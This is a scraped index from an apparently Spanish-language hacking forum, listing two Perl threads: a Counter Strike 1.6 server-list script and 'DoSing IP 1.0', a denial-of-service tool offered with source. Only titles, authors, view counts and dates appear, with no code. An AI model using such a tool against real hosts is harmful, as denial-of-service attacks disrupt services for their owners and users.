[Perl] Counter Strike 1.6 Servers List

Iniciado por BigBear

Respuestas: 0
Vistas: 2560
Último mensaje Noviembre 12, 2012, 07:32:11 pm
por BigBear
DoSing IP 1.0 - [Creado por SkillmaX] + Source [PERL]

Iniciado por SkillmaX

Respuestas: 0
Vistas: 2598
Último mensaje Julio 04, 2010, 10:14:31 am
por SkillmaX